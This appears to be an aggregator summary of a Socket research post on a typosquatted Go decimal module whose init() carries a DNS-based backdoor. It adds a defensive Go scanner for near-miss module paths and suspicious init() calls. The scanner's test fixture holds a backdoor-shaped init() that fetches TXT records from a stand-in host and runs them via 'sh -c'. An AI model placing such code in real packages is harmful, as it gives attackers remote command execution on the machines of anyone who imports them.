
Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Blog post from Socket

Post Details
Company: Socket
Date Published: not listed
Author: Kush Pandya
Word Count: 2,564
Company Posts That Month: 27
Language: English
Hacker News Points: -
Summary

Socket's Threat Research Team discovered a malicious Go module, github.com/shopsprint/decimal, a typosquat of the legitimate github.com/shopspring/decimal library used for arbitrary-precision decimal arithmetic in the Go ecosystem. The module was weaponized on August 19, 2023, when version v1.3.3 introduced a malicious init() function that opens a command-and-control channel over DNS TXT records to a subdomain under the threat actor's control; commands received over that channel can be executed on the affected machine. Although the shopsprint GitHub repository and owner account have since been removed, the malicious version remains downloadable through proxy.golang.org. The attack follows a "trust-then-poison" pattern: the module sat benign for years, accumulating the appearance of legitimacy, before the backdoored release. The code abuses Go's package initialization: init() runs automatically when the package is imported, so the backdoor executes without any call from the importing program and produces no user-visible output. Its persistence is a side effect of Go's reproducibility model: the module mirror retains published versions indefinitely so that builds stay reproducible, which means deleting the upstream repository does not remove the poisoned version. Teams can check for exposure by searching go.mod and go.sum files for the shopsprint/decimal path. The incident highlights typosquatting as a software supply chain risk and underscores the importance of vigilant dependency management in development environments.
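The two checks the summary points to, a near-miss scan of dependency paths and a look for init() functions that do DNS lookups or spawn commands, as an added Go example written for this page; it is not Socket's tooling or the shopspring project's code. The allow-list of known modules is hypothetical, the dependency list and the init() source are constructed fixtures (the fixture is only parsed, never built or run), and the call-matching works on spelled identifiers, so an aliased import would evade it:

```go
package main

import "fmt"
import "go/ast"
import "go/parser"
import "go/token"

// knownModules is a hypothetical allow-list; samplePaths is a constructed dependency
// list (as `go list -m -f '{{.Path}}' all` prints it) whose first entry is the post's typosquat.
var knownModules = []string{"github.com/shopspring/decimal", "github.com/stretchr/testify"}
var samplePaths = []string{"github.com/shopsprint/decimal", "github.com/stretchr/testify"}

// sampleSource is a constructed fixture with the shape of the backdoor the post
// describes (init() -> DNS TXT lookup -> command); it is parsed, never run.
const sampleSource = `package decimal
func init() {
	txt, _ := net.LookupTXT("c2.example.invalid")
	_ = exec.Command("sh", "-c", txt[0])
}
`

// levenshtein is the edit distance (insert, delete, substitute) between a and b.
func levenshtein(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	prev := make([]int, len(rb)+1)
	for j := range prev {
		prev[j] = j
	}
	for i, ca := range ra {
		cur := []int{i + 1}
		for j, cb := range rb {
			best := prev[j] // substitution: free if the runes match
			if ca != cb {
				best++
			}
			if v := prev[j+1] + 1; v < best { // deletion
				best = v
			}
			if v := cur[j] + 1; v < best { // insertion
				best = v
			}
			cur = append(cur, best)
		}
		prev = cur
	}
	return prev[len(rb)]
}

// NearMisses maps each dependency within maxDist edits of a known module (but not
// equal to it) to that module; "shopsprint" vs "shopspring" is one substitution.
func NearMisses(paths []string, maxDist int) map[string]string {
	out := map[string]string{}
	for _, p := range paths {
		for _, k := range knownModules {
			if d := levenshtein(p, k); d > 0 && d <= maxDist {
				out[p] = k
			}
		}
	}
	return out
}

// suspiciousCalls have no business in a library's init(). Matching is on the spelled
// identifier, so an aliased import would evade it; a real tool resolves imports.
var suspiciousCalls = map[string]bool{"net.LookupTXT": true, "exec.Command": true}

// SuspiciousInit parses one Go file and reports which suspicious calls appear inside
// any top-level init(), the function Go runs on import with no visible call site.
func SuspiciousInit(src string) (map[string]bool, error) {
	file, err := parser.ParseFile(token.NewFileSet(), "scan.go", src, 0)
	if err != nil {
		return nil, err
	}
	found := map[string]bool{}
	for _, decl := range file.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Recv != nil || fn.Name.Name != "init" || fn.Body == nil {
			continue
		}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			if call, ok := n.(*ast.CallExpr); ok {
				if sel, ok := call.Fun.(*ast.SelectorExpr); ok {
					if pkg, ok := sel.X.(*ast.Ident); ok && suspiciousCalls[pkg.Name+"."+sel.Sel.Name] {
						found[pkg.Name+"."+sel.Sel.Name] = true
					}
				}
			}
			return true
		})
	}
	return found, nil
}

func main() {
	fmt.Println("near misses:", NearMisses(samplePaths, 2))
	calls, _ := SuspiciousInit(sampleSource)
	fmt.Println("suspicious calls in init():", calls)
}
```

In practice, feed NearMisses the output of `go list -m all` for the build in question and run SuspiciousInit over every file in the module cache for a flagged dependency; an exact match against the allow-list is the trusted module itself and is deliberately not reported, and a DNS lookup paired with command execution inside init() is the shape to escalate on.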

Trends Found in this Post
Trend                  Post Mentions   Total Month Mentions   Posts   Companies   MoM
AI Coding Assistant    2               1,798                  527     167         +21%
MCP                    1               7,098                  726     186         +16%
Secrets Management     1               2,152                  360     101         +18%